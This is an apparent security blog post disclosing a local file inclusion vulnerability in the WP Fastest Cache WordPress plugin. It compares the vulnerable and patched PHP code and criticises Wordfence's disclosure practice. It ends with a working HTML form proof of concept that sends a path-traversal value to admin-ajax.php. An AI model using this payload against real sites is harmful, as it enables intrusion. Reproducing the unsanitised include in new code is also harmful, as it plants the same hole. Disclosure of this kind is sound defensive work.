26 May

Protecting You Against Wordfence’s Bad Practices: Local File Inclusion Vulnerability in WP Fastest Cache

Wordfence is putting WordPress website at risk by disclosing vulnerabilities in plugins with critical details needed to double check their work missing, in what appears to be an attempt to profit off of these vulnerabilities. We are releasing those details so that others can review the vulnerabilities to try to limit the damage Wordfence’s practice could cause.

Wordfence describes the vulnerability in WP Fastest Cache version 0.8.5.7 as “The Local File Inclusion vulnerability allows an attacker to execute code on the target web server or on a site visitor’s browser. This enables the attacker to steal or manipulate data, perform a denial of service attack or enable additional attack types such as Cross Site Scripting.”

The relevant change in the next version was to restrict the AJAX accessible function wpfc_cdn_template_ajax_request_callback() to Administrator level users in the file /wpFastestCache.php .

Code in 0.8.5.7:

318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333

public function wpfc_cdn_template_ajax_request_callback(){
	ob_start();
	include_once(WPFC_MAIN_PATH."templates/cdn/".$_POST["id"].".php");
	$content = ob_get_contents();
	ob_end_clean();
 
	$res = array("success" => false, "content" => "");
 
	if($data = @file_get_contents(WPFC_MAIN_PATH."templates/cdn/".$_POST["id"].".php")){
		$res["success"] = true;
		$res["content"] = $content;
	}
 
	echo json_encode($res);
	exit;
}

Code in 0.8.5.8:

327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346

public function wpfc_cdn_template_ajax_request_callback(){
	if(current_user_can('manage_options')){
		ob_start();
		include_once(WPFC_MAIN_PATH."templates/cdn/".$_POST["id"].".php");
		$content = ob_get_contents();
		ob_end_clean();
 
		$res = array("success" => false, "content" => "");
 
		if($data = @file_get_contents(WPFC_MAIN_PATH."templates/cdn/".$_POST["id"].".php")){
			$res["success"] = true;
			$res["content"] = $content;
		}
 
		echo json_encode($res);
		exit;
	}else{
		wp_die("Must be admin");
	}
}

Wordfence’s description notably doesn’t mention that the attacker needs to be logged in to WordPress to exploit this, which severely limits the severity of the vulnerability.

Proof of Concept

The following proof of concept will cause a file named test.php located in the root directory of the WordPress installation to be included.

Make sure you are logged in to WordPress, ideally as a subscriber since they have the least capabilities. Also, make sure to replace “[path to WordPress]” with the location of WordPress

<html>
 <body>
 <form action="http://[path to WordPress]/wp-admin/admin-ajax.php"; method="POST">
 <input type="hidden" name="action" value="wpfc_cdn_template_ajax_request" />
 <input type="hidden" name="id" value="../../../../../test" />
 <input type="submit" value="Submit" />
 </form>
 </body>
</html>